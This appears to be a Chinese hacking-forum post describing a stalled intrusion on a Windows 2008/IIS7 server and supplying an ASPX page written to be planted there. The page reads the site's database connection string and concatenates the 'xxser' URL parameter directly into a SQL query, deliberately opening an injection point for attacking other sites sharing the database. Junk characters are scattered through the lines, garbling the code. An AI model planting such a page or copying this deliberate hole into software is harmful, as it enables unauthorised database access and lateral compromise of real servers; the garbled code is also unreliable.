利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
9 E, q2 s* S: @1 i其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
/ W+ c  z7 o- [* A+ O% ]代码量不多，自己写个拉倒了。烦死了。

​
" v% {/ r( W6 M) ?<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
/ x- Q9 o3 f0 I' y8 M    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
: E* F0 w$ `+ a5 ]    <div>
" R/ Y+ s; N* I* [0 P2 j8 j9 U     <script language="c#" runat="server">
" m! p, o' _, T+ F7 d            
         void page_init(object sender, EventArgs e)
         {
            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
3 K' F) i& l6 L- d* k! @$ c. l             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
            
' a2 n, c; M# [) _             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
1 C9 ?6 _* F2 V2 V$ m             Response.Write(x);
             conn.Close();
         }
     
- |4 X7 g- l; E& B3 k  </script>
    </div>
3 s+ j8 V2 O- b- h0 w& L9 l; Y    </form>
5 \" n5 y, n1 m2 n</body>
* C! q% i3 W  U5 V( e1 S8 f/ X</html>
$ V- T9 |& E6 H1 A7 O